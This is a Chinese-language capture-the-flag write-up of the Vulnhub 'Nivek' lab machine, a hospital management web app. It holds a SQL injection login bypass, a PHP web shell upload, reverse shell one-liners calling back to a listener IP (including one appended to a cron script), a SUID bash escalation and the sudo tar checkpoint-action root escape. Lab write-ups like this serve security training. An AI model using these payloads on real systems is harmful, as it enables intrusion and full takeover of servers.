Vulnhub-Nivek

靶机下载地址:

https://download.vulnhub.com/hms/niveK.ova

nmap 探测靶机ip 192.168.112.212

nmap 192.168.112.212 扫描开放端口

wps169

wps170

7080应该是一个web网站

一个医疗管理系统

wps171

login.php目录爆破

wps172

[17:54:58] 200 -   1KB - /files/

[17:54:58] 200 -   2KB - /footer.php

[17:54:58] 200 -   5KB - /forgot_password.php(忘记密码)

[17:54:59] 200 -   5KB - /header.php

[17:54:59] 200 -   2KB - /head.php

[17:55:01] 302 -  14KB - /index.php  ->  login.php

[17:55:02] 302 -  14KB - /index.php/login/  ->  login.php

[17:55:03] 200 -   4KB - /login.php

[17:55:03] 200 -   48B - /logout.php

[17:55:06] 200 -  890B - /pages/

[17:55:06] 301 -  242B - /pages  ->  http://192.168.112.212:7080/pages/

[17:55:09] 302 -  13KB - /profile.php  ->  login.php

[17:55:12] 200 -   6KB - /signup.php

[17:55:15] 200 -   6B - /test.php

先尝试万能密码能否直接登录

'OR 1=1 #

'OR 1=1 --

wps173

可以登录后台

wps174

访问源码,发现一个setting.php

wps175

http://192.168.112.212:7080/setting.php

该页面可以上传文件

wps176

上传一个php文件

文件路径为:

http://192.168.112.212:7080/uploadImage/Logo/cmd.php

使用蚁剑连接

wps177

wps178

第一个flag在 home目录下的一个用户

wps179

wps180

传一个反弹上去

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.112.60/6666 0>&1'");?>

蚁剑虚拟终端执行php文件

Kali 监听6666端口

nc -lvvp 6666

wps181

使用python提升为命令行

python -c "import pty;pty.spawn('/bin/bash')"

查找suid文件

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

wps182

说明执行/usr/bin/bash就会临时有eren的权限

/usr/bin/bash -p

wps183

现在是eren用户

查看任务计划 cat /etc/crontab

发现每隔5分钟,/home/eren/backup.sh文件每五分钟会自动运行一次

尝试将反向shell写入/home/eren/backup.sh,等待连接

echo "bash -i >& /dev/tcp/192.168.112.60/1234 0>&1" >> /home/eren/backup.sh

wps184

wps185

等待5分钟

wps186

查看权限 sudo -l

wps187

发现可以使用root的/bin/tar

尝试tar提权漏洞

sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

最后在root目录下找到flag

wps188